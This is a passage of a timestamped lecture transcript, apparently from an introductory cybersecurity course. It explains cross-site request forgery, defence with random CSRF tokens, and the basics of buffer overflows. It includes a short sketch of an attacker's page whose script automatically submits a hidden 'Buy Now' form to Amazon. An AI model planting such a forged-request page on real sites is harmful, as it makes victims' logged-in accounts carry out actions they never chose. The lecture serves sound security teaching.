here, one of which 1510 01:19:39,210 --> 01:19:42,700 is of type hidden. Well, what's going on here? 1511 01:19:42,700 --> 01:19:45,000 Well, it turns out that, in HTML forms, you 1512 01:19:45,000 --> 01:19:48,370 can create key-value pairs to send input to a server. 1513 01:19:48,370 --> 01:19:53,670 So if you recall previously, I used the "dp" part of the URL 1514 01:19:53,670 --> 01:19:56,850 to separate amazon.com from the product ID. 1515 01:19:56,850 --> 01:19:59,850 And here-- and now I'm making this up for the sake of discussion-- 1516 01:19:59,850 --> 01:20:05,280 I'm supposing that Amazon supports a web form input named 1517 01:20:05,280 --> 01:20:10,230 dp whose type is hidden because the user doesn't need to see this, 1518 01:20:10,230 --> 01:20:12,970 but the value is that same product ID. 1519 01:20:12,970 --> 01:20:16,920 So this is an alternative to embedding that product ID in the URL. 1520 01:20:16,920 --> 01:20:23,428 Instead, I'm saying there's an HTTP parameter called dp, the value of which 1521 01:20:23,428 --> 01:20:23,970 will be this. 1522 01:20:23,970 --> 01:20:25,678 But it's hidden, so the user doesn't even 1523 01:20:25,678 --> 01:20:29,610 see it, which is fine, because the whole point is a nice, simple Buy Now button. 1524 01:20:29,610 --> 01:20:30,750 How do we get that button? 1525 01:20:30,750 --> 01:20:33,328 We use a button tag in HTML, the type of which 1526 01:20:33,328 --> 01:20:36,120 is just submit, because its purpose in life is to submit this form.
1527 01:20:36,120 --> 01:20:40,290 And the text that the user sees for this button is indeed "Buy Now." 1528 01:20:40,290 --> 01:20:41,340 So what am I doing? 1529 01:20:41,340 --> 01:20:43,620 This will make more sense, admittedly, to those of you 1530 01:20:43,620 --> 01:20:45,787 who've already studied a bit of web development, who 1531 01:20:45,787 --> 01:20:47,130 have written HTML yourself. 1532 01:20:47,130 --> 01:20:51,900 But I'm essentially making it harder for an adversary 1533 01:20:51,900 --> 01:20:56,320 to automate an attack on a user's Amazon account. 1534 01:20:56,320 --> 01:20:56,880 Why? 1535 01:20:56,880 --> 01:21:01,230 Because I am not just using a link anymore 1536 01:21:01,230 --> 01:21:06,630 that the user might click or a URL that could be subtly hidden in an image tag. 1537 01:21:06,630 --> 01:21:08,910 Now I have an actual web form. 1538 01:21:08,910 --> 01:21:12,660 And at least based on my naive understanding of HTML 1539 01:21:12,660 --> 01:21:15,510 at the moment in this story, this would seem 1540 01:21:15,510 --> 01:21:18,330 to require that a human click an actual button. 1541 01:21:18,330 --> 01:21:22,120 Like, I cannot use this as the source of an image. 1542 01:21:22,120 --> 01:21:23,010 It's not a URL. 1543 01:21:23,010 --> 01:21:24,670 It's all of this complexity. 1544 01:21:24,670 --> 01:21:27,120 So if you're familiar with GET versus POST, 1545 01:21:27,120 --> 01:21:29,610 you might be inclined to think that, OK, POST surely 1546 01:21:29,610 --> 01:21:34,260 solves the problem by using this web form because you make sure in this way 1547 01:21:34,260 --> 01:21:37,920 that someone clicks the button before they can buy anything. 1548 01:21:37,920 --> 01:21:41,190 Now, why is that indeed naive? 1549 01:21:41,190 --> 01:21:44,460 Well, it turns out using not just HTML but this language 1550 01:21:44,460 --> 01:21:48,150 we've seen a little bit of today, namely, JavaScript, can 1551 01:21:48,150 --> 01:21:52,210 be used to automate the process of submitting a form. 1552 01:21:52,210 --> 01:21:56,790 So if an adversary now has this HTML in their website, 1553 01:21:56,790 --> 01:21:59,010 they don't have to wait and hope that someone 1554 01:21:59,010 --> 01:22:03,060 like you or me is going to come along and click the button explicitly, 1555 01:22:03,060 --> 01:22:05,700 because that would be a little weird to click a button thinking 1556 01:22:05,700 --> 01:22:08,880 you're going to buy something now, but it's not on the actual amazon.com. 1557 01:22:08,880 --> 01:22:10,350 That alone doesn't matter. 1558 01:22:10,350 --> 01:22:14,190 If the adversary can just trick you into visiting their website, 1559 01:22:14,190 --> 01:22:20,250 and their website contains this HTML and this additional JavaScript, 1560 01:22:20,250 --> 01:22:23,850 they can immediately submit this form for you 1561 01:22:23,850 --> 01:22:26,820 to Amazon without you clicking a thing. 1562 01:22:26,820 --> 01:22:27,360 Why? 1563 01:22:27,360 --> 01:22:30,880 Well, inside of this script tag that I've added down below, 1564 01:22:30,880 --> 01:22:33,810 I've simply said, document.forms[0]. 1565 01:22:33,810 --> 01:22:36,600 So this means get me the first form on the page-- 1566 01:22:36,600 --> 01:22:38,730 and I'm presuming there's only one in this story-- 1567 01:22:38,730 --> 01:22:40,240 and then submit it. 
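Putting the pieces together, the adversary's page might look something like this (a sketch; the action URL and the form fields are the hypothetical ones from this discussion, not Amazon's actual API):

    <form action="https://www.amazon.com/..." method="post">
        <input type="hidden" name="dp" value="B07XLQ2FSK">
        <button type="submit">Buy Now</button>
    </form>
    <script>
        // Submit the first (and only) form as soon as the page loads,
        // without the victim clicking anything.
        document.forms[0].submit();
    </script>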
1568 01:22:40,240 --> 01:22:43,170 So this is to say, in JavaScript, not only can you 1569 01:22:43,170 --> 01:22:46,620 do things like trigger alerts on the screen, those dialog windows. 1570 01:22:46,620 --> 01:22:51,270 You can similarly, through code, automatically submit forms. 1571 01:22:51,270 --> 01:22:53,460 So it doesn't matter that you're using POST. 1572 01:22:53,460 --> 01:22:56,850 It doesn't matter that you have an actual button that must be clicked. 1573 01:22:56,850 --> 01:22:59,100 It doesn't have to be a human that clicks that button. 1574 01:22:59,100 --> 01:23:03,180 It can be their browser automatically executing this JavaScript code 1575 01:23:03,180 --> 01:23:07,600 in the adversary's website that just submits that form for them. 1576 01:23:07,600 --> 01:23:12,510 So this is the essence now of a cross-site request forgery. 1577 01:23:12,510 --> 01:23:16,080 If HTML like this exists in the adversary's 1578 01:23:16,080 --> 01:23:19,740 website, some other website, you can nonetheless 1579 01:23:19,740 --> 01:23:24,600 trick users into executing operations across websites, 1580 01:23:24,600 --> 01:23:28,170 on amazon.com in this case, even though the users themselves 1581 01:23:28,170 --> 01:23:29,970 are not on amazon.com. 1582 01:23:29,970 --> 01:23:33,450 So that's the cross-site aspect of these attacks. 1583 01:23:33,450 --> 01:23:36,960 And it's a request forgery in the sense that it's 1584 01:23:36,960 --> 01:23:40,380 sending all of the right information, but it's forged by the adversary. 1585 01:23:40,380 --> 01:23:44,190 It's not coming from the amazon.com developers themselves. 1586 01:23:44,190 --> 01:23:48,300 But it is this simple, because if Amazon does not defend against this attack, 1587 01:23:48,300 --> 01:23:51,390 there is nothing stopping you or me or any adversary 1588 01:23:51,390 --> 01:23:54,390 from including code like this on our websites, 1589 01:23:54,390 --> 01:23:57,060 somehow tricking users into visiting our websites, 1590 01:23:57,060 --> 01:24:01,860 and, boom, having products sent to them automatically-- assuming they have 1591 01:24:01,860 --> 01:24:06,330 an amazon.com account, and they're already logged into it in another tab, 1592 01:24:06,330 --> 01:24:10,210 or at least earlier in the day, for instance. 1593 01:24:10,210 --> 01:24:14,040 All right, any questions now on this particular attack, 1594 01:24:14,040 --> 01:24:17,640 these cross-site request forgeries, whether implemented 1595 01:24:17,640 --> 01:24:21,390 using GET with simple URLs or even implemented 1596 01:24:21,390 --> 01:24:24,660 with POST using actual forms? 1597 01:24:24,660 --> 01:24:28,410 AUDIENCE: How can AI model and quantum computing change the way 1598 01:24:28,410 --> 01:24:31,043 that we look at cyber security? 1599 01:24:31,043 --> 01:24:32,460 DAVID J. MALAN: Quantum computing? 1600 01:24:32,460 --> 01:24:34,860 Let me address that another time because I daresay that's 1601 01:24:34,860 --> 01:24:36,840 a bit far from today's goals. 1602 01:24:36,840 --> 01:24:42,300 But quantum computing is bad if the bad guys have it and you and I don't. 1603 01:24:42,300 --> 01:24:43,590 I'll put it that way. 1604 01:24:43,590 --> 01:24:46,080 All right, so how can we defend against this threat 1605 01:24:46,080 --> 01:24:49,860 even when there's JavaScript code automatically inducing 1606 01:24:49,860 --> 01:24:52,590 submission of these forms, which have enough information in them 1607 01:24:52,590 --> 01:24:54,870 in order to buy something on our behalf? 
1608 01:24:54,870 --> 01:25:00,120 Well, it turns out that we could include something like a special token. 1609 01:25:00,120 --> 01:25:04,380 And it turns out a common way to address this problem is by having the server 1610 01:25:04,380 --> 01:25:07,230 not just output a simple HTML form but to output 1611 01:25:07,230 --> 01:25:12,980 an HTML form that additionally has another value, often hidden as well. 1612 01:25:12,980 --> 01:25:17,200 And by convention, in some worlds, it's called the CSRF token, which is just 1613 01:25:17,200 --> 01:25:19,370 a fancy way of saying an extra value. 1614 01:25:19,370 --> 01:25:21,820 But its value is typically meant to be random. 1615 01:25:21,820 --> 01:25:25,600 And I've chosen something fairly pronounceable here, "1234abcd," 1616 01:25:25,600 --> 01:25:29,225 but assume that that value is randomly generated by the server. 1617 01:25:29,225 --> 01:25:31,850 And it might have a bunch of numbers, a bunch of letters in it. 1618 01:25:31,850 --> 01:25:35,050 But the point is that it's randomly generated by the server. 1619 01:25:35,050 --> 01:25:36,920 Now, why is this important? 1620 01:25:36,920 --> 01:25:42,400 The implication of this mechanism, by having a web server output not 1621 01:25:42,400 --> 01:25:48,430 only the product ID and also the button inside of a form 1622 01:25:48,430 --> 01:25:51,190 that they might be using to implement this Buy Now feature-- 1623 01:25:51,190 --> 01:25:53,890 the point is that the server should also be generating 1624 01:25:53,890 --> 01:25:58,210 some secret, randomly generated piece of information in that server 1625 01:25:58,210 --> 01:26:00,440 as well, in that HTML as well. 1626 01:26:00,440 --> 01:26:03,190 And the server should remember that value 1627 01:26:03,190 --> 01:26:06,520 as by using its own database or some other mechanism. 1628 01:26:06,520 --> 01:26:11,440 The point here, though, is that only the server, amazon.com in this case, 1629 01:26:11,440 --> 01:26:15,400 knows what that value should be for you, a specific user. 1630 01:26:15,400 --> 01:26:20,200 And so an adversary, even if they trick you into visiting their website, 1631 01:26:20,200 --> 01:26:22,910 where they have HTML that looks quite like this-- 1632 01:26:22,910 --> 01:26:25,750 the adversary, unless they've hacked amazon.com, 1633 01:26:25,750 --> 01:26:27,610 which is not part of this story-- 1634 01:26:27,610 --> 01:26:32,740 they would have no idea what this random value is that amazon.com 1635 01:26:32,740 --> 01:26:35,628 is using for your Buy Now buttons, because again, 1636 01:26:35,628 --> 01:26:37,420 if it's just an adversary on the internet-- 1637 01:26:37,420 --> 01:26:38,980 they haven't taken over amazon.com. 1638 01:26:38,980 --> 01:26:41,680 They haven't taken over your computer itself. 1639 01:26:41,680 --> 01:26:46,300 They are just trying to trick you into visiting a web page of their own 1640 01:26:46,300 --> 01:26:47,740 that has HTML like this. 1641 01:26:47,740 --> 01:26:49,820 They won't know what value to put there. 1642 01:26:49,820 --> 01:26:51,850 Now, they can try to guess, and maybe they 1643 01:26:51,850 --> 01:26:57,040 could guess "1234abcd," but assuming it's more random than that, the odds 1644 01:26:57,040 --> 01:27:01,660 that that adversary guesses your CSRF token value is 1645 01:27:01,660 --> 01:27:04,960 just so small and low probability that it's just not 1646 01:27:04,960 --> 01:27:07,250 going to happen realistically. 
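Concretely, the form that the real amazon.com sends to your browser might now look something like this (a sketch; the field names are illustrative, and a real token would be long and random):

    <form action="https://www.amazon.com/..." method="post">
        <input type="hidden" name="csrf_token" value="1234abcd">
        <input type="hidden" name="dp" value="B07XLQ2FSK">
        <button type="submit">Buy Now</button>
    </form>

The server remembers which token it issued for your session and rejects any submission whose token doesn't match.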
1647 01:27:07,250 --> 01:27:11,380 So now, even if you visit a web page that contains this HTML, even if it 1648 01:27:11,380 --> 01:27:13,930 has some JavaScript that automatically submits the form, 1649 01:27:13,930 --> 01:27:17,410 because the adversary doesn't know the value of this CSRF token, 1650 01:27:17,410 --> 01:27:21,400 amazon.com can just ignore the request to buy that product now. 1651 01:27:21,400 --> 01:27:23,320 And they can throw up an error message or say 1652 01:27:23,320 --> 01:27:25,040 something went wrong or the like. 1653 01:27:25,040 --> 01:27:28,120 But the point is that only the real amazon.com 1654 01:27:28,120 --> 01:27:33,040 should be able to generate and remember this CSRF token value. 1655 01:27:33,040 --> 01:27:36,310 And so therefore, they can validate server-side 1656 01:27:36,310 --> 01:27:40,120 that it's indeed you who intends to buy something now. 1657 01:27:40,120 --> 01:27:43,580 The adversary-- if they put a blank value there or any other value, 1658 01:27:43,580 --> 01:27:45,880 it's not going to be validated server-side 1659 01:27:45,880 --> 01:27:47,650 because the server realizes, uh-uh. 1660 01:27:47,650 --> 01:27:49,600 That's not the value I'm using for David. 1661 01:27:49,600 --> 01:27:52,310 That's not the value I'm using for you. 1662 01:27:52,310 --> 01:27:53,920 So this is a very common technique. 1663 01:27:53,920 --> 01:27:56,110 It does require a bit more complexity on the server. 1664 01:27:56,110 --> 01:27:58,360 Very often, programming languages, like Python, 1665 01:27:58,360 --> 01:28:01,170 will come with libraries, third-party libraries or code 1666 01:28:01,170 --> 01:28:02,920 that other people have written, that allow 1667 01:28:02,920 --> 01:28:06,220 you to add this functionality to your own software. 1668 01:28:06,220 --> 01:28:08,530 But you have to know that the threat exists, 1669 01:28:08,530 --> 01:28:11,860 and you have to look for a solution there too 1670 01:28:11,860 --> 01:28:16,270 or implement it yourself if need be, but almost always a library 1671 01:28:16,270 --> 01:28:17,630 is the answer to this problem. 1672 01:28:17,630 --> 01:28:20,500 There's another way you can solve this same problem, which doesn't 1673 01:28:20,500 --> 01:28:22,570 involve outputting any HTML at all. 1674 01:28:22,570 --> 01:28:25,420 It is also possible to send these kinds of tokens 1675 01:28:25,420 --> 01:28:28,840 as HTTP headers as well, as might commonly 1676 01:28:28,840 --> 01:28:32,200 be the case when a website is very heavily using JavaScript 1677 01:28:32,200 --> 01:28:36,580 and is using JavaScript to talk directly to a server without even any HTML. 1678 01:28:36,580 --> 01:28:41,300 Well, the same values can be sent via this other mechanism as well. 1679 01:28:41,300 --> 01:28:45,670 So if you're interested in these kinds of web-centric attacks especially, 1680 01:28:45,670 --> 01:28:49,750 you might find it interesting to explore the Open Worldwide Application Security 1681 01:28:49,750 --> 01:28:54,220 Project, which has documentation of, discussion of, and recommendations 1682 01:28:54,220 --> 01:28:58,148 for all of these kinds of web-centric attacks and more. 1683 01:28:58,148 --> 01:29:00,440 For now, though, let's go ahead and take a short break.
1684 01:29:00,440 --> 01:29:02,380 And when we come back, we'll look at problems 1685 01:29:02,380 --> 01:29:05,650 that go beyond the world of the web, specifically to software 1686 01:29:05,650 --> 01:29:10,140 that you might have running on your own Macs, PCs, or phones. 1687 01:29:10,140 --> 01:29:11,650 All right, we're back. 1688 01:29:11,650 --> 01:29:15,210 Let's now consider a class of attacks that is particularly common when 1689 01:29:15,210 --> 01:29:19,530 it comes to software that's running on your own Mac or your PC or your phone, 1690 01:29:19,530 --> 01:29:21,410 so not web based, but local instead. 1691 01:29:21,410 --> 01:29:23,160 And the first of those is generally called 1692 01:29:23,160 --> 01:29:26,910 arbitrary code execution, the potential for an adversary 1693 01:29:26,910 --> 01:29:32,910 to somehow trick your own computer into executing code that you, the adversary, 1694 01:29:32,910 --> 01:29:36,780 have written and that's not embedded in the actual software that's 1695 01:29:36,780 --> 01:29:38,020 meant to execute it. 1696 01:29:38,020 --> 01:29:42,090 This is an example more generally of what might be called a remote code 1697 01:29:42,090 --> 01:29:45,420 execution, whereby the same attack can happen even if the adversary is 1698 01:29:45,420 --> 01:29:47,550 somewhere else in the world, perhaps connected 1699 01:29:47,550 --> 01:29:50,100 to you somehow via the internet. 1700 01:29:50,100 --> 01:29:52,530 And how might these attacks be possible? 1701 01:29:52,530 --> 01:29:56,940 Very, very common mechanism for waging these kinds of attacks whereby 1702 01:29:56,940 --> 01:30:01,530 an adversary tricks your own system into executing code that the adversary wrote 1703 01:30:01,530 --> 01:30:04,170 is through something generally known as a buffer overflow. 1704 01:30:04,170 --> 01:30:05,920 Now, to be fair, this is a topic you would 1705 01:30:05,920 --> 01:30:09,120 explore in more detail in a class on programming 1706 01:30:09,120 --> 01:30:11,320 specifically, computer science more generally. 1707 01:30:11,320 --> 01:30:13,270 But we'll give you a high-level sense of what 1708 01:30:13,270 --> 01:30:16,840 the threat is as it relates to software that might very well be 1709 01:30:16,840 --> 01:30:18,950 running on your own computer. 1710 01:30:18,950 --> 01:30:20,860 So what is a buffer overflow? 1711 01:30:20,860 --> 01:30:23,410 Well, for this, we need a mental model for what's 1712 01:30:23,410 --> 01:30:26,140 going on inside of your computer when running a program. 1713 01:30:26,140 --> 01:30:29,170 And when you double-click a program on your Mac or PC or your phone, 1714 01:30:29,170 --> 01:30:32,470 and it opens up and loads into the computer's memory, 1715 01:30:32,470 --> 01:30:35,770 the memory, you can think of, is this big, rectangular region 1716 01:30:35,770 --> 01:30:39,070 that represents all of the bytes or megabytes or gigabytes 1717 01:30:39,070 --> 01:30:41,650 that are in your Mac, your PC, or your phone. 1718 01:30:41,650 --> 01:30:44,290 And the computer, or device, more generally, 1719 01:30:44,290 --> 01:30:47,300 uses different parts of this memory for different purposes. 1720 01:30:47,300 --> 01:30:50,200 And this is just because humans came up with conventions years ago 1721 01:30:50,200 --> 01:30:53,770 to lay out the computer's memory in this way-- using some of it 1722 01:30:53,770 --> 01:30:56,110 up here for one purpose, using some of the memory 1723 01:30:56,110 --> 01:30:58,640 down here for another purpose instead. 
1724 01:30:58,640 --> 01:31:01,870 So, for instance, if this big rectangle represents 1725 01:31:01,870 --> 01:31:05,440 your phone or your computer's memory, let me just propose that, 1726 01:31:05,440 --> 01:31:07,570 at the top of it, so to speak-- although memory 1727 01:31:07,570 --> 01:31:09,820 doesn't have a top, bottom, left, or right because it totally 1728 01:31:09,820 --> 01:31:11,195 depends on how you're holding it. 1729 01:31:11,195 --> 01:31:14,440 But assume conceptually that at the top of your computer's memory 1730 01:31:14,440 --> 01:31:17,470 is the machine code for the program you're running. 1731 01:31:17,470 --> 01:31:21,760 So long story short, when you write software, at the end of the day, 1732 01:31:21,760 --> 01:31:23,590 zeros and ones are involved. 1733 01:31:23,590 --> 01:31:27,070 And the zeros and ones represent the instructions or commands 1734 01:31:27,070 --> 01:31:30,100 that that software wants to execute on your computer. 1735 01:31:30,100 --> 01:31:34,210 When you click an icon or double-click an icon and load a program into memory, 1736 01:31:34,210 --> 01:31:38,410 the actual program's machine code-- the zeros and ones, if you will-- 1737 01:31:38,410 --> 01:31:41,140 are stored up here in your computer's memory. 1738 01:31:41,140 --> 01:31:44,320 Meanwhile, while a program is running, it 1739 01:31:44,320 --> 01:31:47,380 might need more or less additional memory 1740 01:31:47,380 --> 01:31:50,092 as it executes instructions therein. 1741 01:31:50,092 --> 01:31:51,050 So what does this mean? 1742 01:31:51,050 --> 01:31:53,680 Well, if the program is prompting you for input 1743 01:31:53,680 --> 01:31:56,260 or if it needs to load a new level from a game, 1744 01:31:56,260 --> 01:31:57,910 it might need more and more memory. 1745 01:31:57,910 --> 01:32:00,260 But eventually, it might not need that memory anymore. 1746 01:32:00,260 --> 01:32:02,260 So the memory requirements of a program tend 1747 01:32:02,260 --> 01:32:05,770 to go up and down all the time based on what you, the human, 1748 01:32:05,770 --> 01:32:09,760 are doing with the software and based on what the software is designed to do. 1749 01:32:09,760 --> 01:32:12,940 So computers typically use this bottom area 1750 01:32:12,940 --> 01:32:16,540 of the computer's memory for a so-called stack, very similar in spirit 1751 01:32:16,540 --> 01:32:19,090 to any physical thing that you might stack one 1752 01:32:19,090 --> 01:32:23,680 on top of the other, like clothes in a closet or trays in a cafeteria. 1753 01:32:23,680 --> 01:32:26,650 Stacking means literally from bottom on up. 1754 01:32:26,650 --> 01:32:29,500 But the weird thing is about a computer's memory 1755 01:32:29,500 --> 01:32:32,530 is that, by convention, when the computer needs memory, 1756 01:32:32,530 --> 01:32:35,540 it first uses some memory from the very bottom. 1757 01:32:35,540 --> 01:32:38,590 And then if it needs more, it uses more above that. 1758 01:32:38,590 --> 01:32:41,480 When it needs more, it uses more above that. 1759 01:32:41,480 --> 01:32:45,220 So instead of just going top to bottom, it actually deliberately, by design, 1760 01:32:45,220 --> 01:32:48,200 goes bottom up for reasons we won't get into in this course. 1761 01:32:48,200 --> 01:32:53,140 But just take on faith that, indeed, this stack of memory grows upward. 
1762 01:32:53,140 --> 01:32:57,610 The catch, though, is that sometimes software doesn't necessarily 1763 01:32:57,610 --> 01:33:02,980 know in advance or predict correctly in advance how much input you, the human, 1764 01:33:02,980 --> 01:33:03,670 might give it. 1765 01:33:03,670 --> 01:33:05,650 So, for instance, a computer program might 1766 01:33:05,650 --> 01:33:08,770 decide to take up this much memory at the bottom 1767 01:33:08,770 --> 01:33:10,990 but then not realize that, oh, wait a minute, what 1768 01:33:10,990 --> 01:33:15,490 if the human types in a really long name or a really long essay or just 1769 01:33:15,490 --> 01:33:19,540 gives me more keystrokes as input than I, the programmer who 1770 01:33:19,540 --> 01:33:21,220 wrote this software, anticipated? 1771 01:33:21,220 --> 01:33:23,590 That might mean that even as you allocate 1772 01:33:23,590 --> 01:33:27,250 what are called frames of memory on this stack, 1773 01:33:27,250 --> 01:33:31,090 the user's input might not stay confined to that particular frame. 1774 01:33:31,090 --> 01:33:33,790 If they type in too many characters at their keyboard, what's 1775 01:33:33,790 --> 01:33:37,010 supposed to go here might end up going down here, 1776 01:33:37,010 --> 01:33:39,890 so overflowing these frames of memory. 1777 01:33:39,890 --> 01:33:42,610 So the computer or the programmer makes hopefully 1778 01:33:42,610 --> 01:33:45,610 an educated guess as to how much input the user might have. 1779 01:33:45,610 --> 01:33:48,280 But if they're wrong, that input might be too tall 1780 01:33:48,280 --> 01:33:52,120 and therefore overlap other parts of the computer's memory. 1781 01:33:52,120 --> 01:33:53,980 Now, there are ways to defend against this. 1782 01:33:53,980 --> 01:33:56,470 So the scenario we're worried about here is often 1783 01:33:56,470 --> 01:33:59,140 when programmers don't know how to anticipate this 1784 01:33:59,140 --> 01:34:03,070 or when you are using software written by programmers who didn't anticipate 1785 01:34:03,070 --> 01:34:05,630 or implement the solution properly. 1786 01:34:05,630 --> 01:34:07,160 So what might go wrong? 1787 01:34:07,160 --> 01:34:09,480 Well, for instance, when a program first starts 1788 01:34:09,480 --> 01:34:12,690 running, one of the first things it does if it's 1789 01:34:12,690 --> 01:34:16,950 calling another routine or another function, when you click on a button, 1790 01:34:16,950 --> 01:34:19,020 when you start typing keystrokes, the computer 1791 01:34:19,020 --> 01:34:21,150 might start using some of this memory, and it 1792 01:34:21,150 --> 01:34:23,675 might be moving around among these zeros and ones, 1793 01:34:23,675 --> 01:34:25,050 executing different instructions. 1794 01:34:25,050 --> 01:34:27,600 If you click this menu option, it'll use this code. 1795 01:34:27,600 --> 01:34:31,170 If you click on this menu option, it'll use this code. 1796 01:34:31,170 --> 01:34:33,060 So in other words, the computer logically 1797 01:34:33,060 --> 01:34:35,850 is kind of moving around among all those zeros and ones 1798 01:34:35,850 --> 01:34:38,500 and executing them accordingly. 1799 01:34:38,500 --> 01:34:42,160 So one of the first things your computer does when a program is running 1800 01:34:42,160 --> 01:34:45,970 is it just jots down at the bottom of the computer's memory 1801 01:34:45,970 --> 01:34:49,433 what is the address to which I should return after doing this.
1802 01:34:49,433 --> 01:34:52,350 So it's kind of like in the real world, if you go off and do something 1803 01:34:52,350 --> 01:34:55,560 over there, eventually, you want to remember to come back over here 1804 01:34:55,560 --> 01:34:57,000 to pick up where you left off. 1805 01:34:57,000 --> 01:34:58,800 And that's what we mean by return address. 1806 01:34:58,800 --> 01:35:00,960 It's a little reminder to yourself that, no matter 1807 01:35:00,960 --> 01:35:02,820 what you go off and do right now, you got 1808 01:35:02,820 --> 01:35:05,340 to come back and resume where you left off. 1809 01:35:05,340 --> 01:35:07,530 And what this return address then does is 1810 01:35:07,530 --> 01:35:12,870 it refers to some specific location in the machine code, some specific pattern 1811 01:35:12,870 --> 01:35:15,810 of zeros and ones that eventually the software should come back 1812 01:35:15,810 --> 01:35:18,240 to pick up when the user leaves off. 1813 01:35:18,240 --> 01:35:22,740 So, for instance, if you open the File menu and go to Print, 1814 01:35:22,740 --> 01:35:25,170 and you go through the steps of printing a document, 1815 01:35:25,170 --> 01:35:28,440 the return address might be to go back to whatever 1816 01:35:28,440 --> 01:35:32,192 you were doing in that document before you initiated the print command. 1817 01:35:32,192 --> 01:35:34,650 So the software is constantly jumping around in this sense. 1818 01:35:34,650 --> 01:35:38,190 Suppose now that the user clicks some button within the software 1819 01:35:38,190 --> 01:35:39,330 to search for something. 1820 01:35:39,330 --> 01:35:40,590 Maybe it's cats. 1821 01:35:40,590 --> 01:35:43,650 Well, because this is a new function that's being called, 1822 01:35:43,650 --> 01:35:46,740 the search function, what the computer might do inside of its memory 1823 01:35:46,740 --> 01:35:49,380 is this-- it might put a little note to self to say, 1824 01:35:49,380 --> 01:35:53,700 go back to this location in the machine code once the user is done searching, 1825 01:35:53,700 --> 01:35:55,740 just like the user might be done printing. 1826 01:35:55,740 --> 01:35:57,900 And then suppose the user types in "cats." 1827 01:35:57,900 --> 01:36:00,180 Well, "cats" is stored in the computer's memory 1828 01:36:00,180 --> 01:36:03,990 just above this frame on the stack because, again, I said, by convention, 1829 01:36:03,990 --> 01:36:08,020 whenever the software uses memory, it starts at the bottom then goes up, 1830 01:36:08,020 --> 01:36:09,540 then goes up, then goes up. 1831 01:36:09,540 --> 01:36:13,510 So after now this software is done searching itself for cats, 1832 01:36:13,510 --> 01:36:16,967 then that frame on the stack is sort of removed because we 1833 01:36:16,967 --> 01:36:18,550 don't need to know about cats anymore. 1834 01:36:18,550 --> 01:36:19,880 We're done searching for them. 1835 01:36:19,880 --> 01:36:22,900 So the last thing in memory is this reminder, go to machine code. 1836 01:36:22,900 --> 01:36:26,650 And this is how the software knows to go back to a particular location in code, 1837 01:36:26,650 --> 01:36:29,980 where maybe it's just sitting there waiting for me to click some other menu 1838 01:36:29,980 --> 01:36:31,660 option instead. 
1839 01:36:31,660 --> 01:36:35,320 But what if an adversary is the one at the keyboard, so to speak, 1840 01:36:35,320 --> 01:36:38,770 and it's not a good user just typing in short phrases like "cats," 1841 01:36:38,770 --> 01:36:41,750 but maybe it's an adversary who's typing something more? 1842 01:36:41,750 --> 01:36:45,400 So suppose that an adversary actually pulls up the search feature. 1843 01:36:45,400 --> 01:36:47,230 And in general, therefore, the software is 1844 01:36:47,230 --> 01:36:49,313 going to remember to put the return address there, 1845 01:36:49,313 --> 01:36:52,930 so specifically something like "go to" this location in the machine code. 1846 01:36:52,930 --> 01:36:55,840 But suppose that the adversary doesn't type in "cats," 1847 01:36:55,840 --> 01:37:00,010 doesn't type in "dogs," but types in, for the sake of discussion, 1848 01:37:00,010 --> 01:37:04,580 some pattern of zeros and ones that represents actual code. 1849 01:37:04,580 --> 01:37:06,520 Maybe it's the pattern of zeros and ones that 1850 01:37:06,520 --> 01:37:09,280 represents, delete everything from a server, 1851 01:37:09,280 --> 01:37:11,530 or start sending emails or the like. 1852 01:37:11,530 --> 01:37:15,220 Or maybe, more cleverly, maybe it means skip 1853 01:37:15,220 --> 01:37:20,080 whatever menu keeps prompting me to register or activate my software. 1854 01:37:20,080 --> 01:37:22,870 In other words, the adversary wants to trick this software 1855 01:37:22,870 --> 01:37:26,025 into running zeros and ones that didn't come with the software. 1856 01:37:26,025 --> 01:37:28,900 Now, in practice, you can't just type zeros and ones at the keyboard. 1857 01:37:28,900 --> 01:37:31,753 It would be a different way that the adversary inputs this data. 1858 01:37:31,753 --> 01:37:34,420 But for the sake of discussion, assume that the adversary is not 1859 01:37:34,420 --> 01:37:37,060 typing in "cats" but is typing in the zeros and ones. 1860 01:37:37,060 --> 01:37:39,730 And they know enough about binary, zeros and ones, 1861 01:37:39,730 --> 01:37:42,220 that they know what patterns to choose. 1862 01:37:42,220 --> 01:37:45,280 Now suppose that this code, this so-called attack code, 1863 01:37:45,280 --> 01:37:51,640 is way longer than C-A-T-S, and it's many more characters or bytes long. 1864 01:37:51,640 --> 01:37:54,970 It is possible, by definition of how memory is used, that this attack 1865 01:37:54,970 --> 01:37:57,190 code might be so big that it takes up not only 1866 01:37:57,190 --> 01:37:59,590 this space that's been allocated for it, but it 1867 01:37:59,590 --> 01:38:02,920 overflows other things in memory. 1868 01:38:02,920 --> 01:38:06,400 You can now think of this frame, this rectangular region 1869 01:38:06,400 --> 01:38:10,090 on the stack to which I keep referring, as like a buffer, a room 1870 01:38:10,090 --> 01:38:11,720 for some amount of information. 1871 01:38:11,720 --> 01:38:14,470 But if the adversary provides so much information, so much 1872 01:38:14,470 --> 01:38:17,500 attack code, zeros and ones, that it overflows that buffer, 1873 01:38:17,500 --> 01:38:20,620 it might actually overwrite that note to self 1874 01:38:20,620 --> 01:38:23,740 with dot, dot, dot, something else. 1875 01:38:23,740 --> 01:38:28,210 And what's clever here, though, is that if the adversary is smart enough-- 1876 01:38:28,210 --> 01:38:30,970 and this is often through lots and lots of trial and error. 1877 01:38:30,970 --> 01:38:32,950 They don't often just get it the first time. 
1878 01:38:32,950 --> 01:38:35,720 If the adversary is ultimately clever enough, 1879 01:38:35,720 --> 01:38:39,250 they can actually put not just some random zeros and ones there, 1880 01:38:39,250 --> 01:38:43,840 but they can put the equivalent of a note to self that says, 1881 01:38:43,840 --> 01:38:46,220 "go to attack code." 1882 01:38:46,220 --> 01:38:48,580 In other words, instead of typing in "cats," 1883 01:38:48,580 --> 01:38:50,830 they type in two things that are pretty long. 1884 01:38:50,830 --> 01:38:54,040 One are the zeros and ones that represent some form of attack, 1885 01:38:54,040 --> 01:38:57,890 like circumvent the registration or the activation for the software 1886 01:38:57,890 --> 01:39:01,390 so I can use it for free, or do something else that's malicious. 1887 01:39:01,390 --> 01:39:04,600 And if the second thing they provide in just so 1888 01:39:04,600 --> 01:39:09,000 happens to be cleverly the address of their own attack code, which 1889 01:39:09,000 --> 01:39:12,060 they can figure out mathematically perhaps through trial and error, 1890 01:39:12,060 --> 01:39:15,060 the adversary can trick the computer into not 1891 01:39:15,060 --> 01:39:16,890 going back up here and running the machine 1892 01:39:16,890 --> 01:39:18,660 code that came with the software. 1893 01:39:18,660 --> 01:39:22,320 The adversary can trick the software into executing code 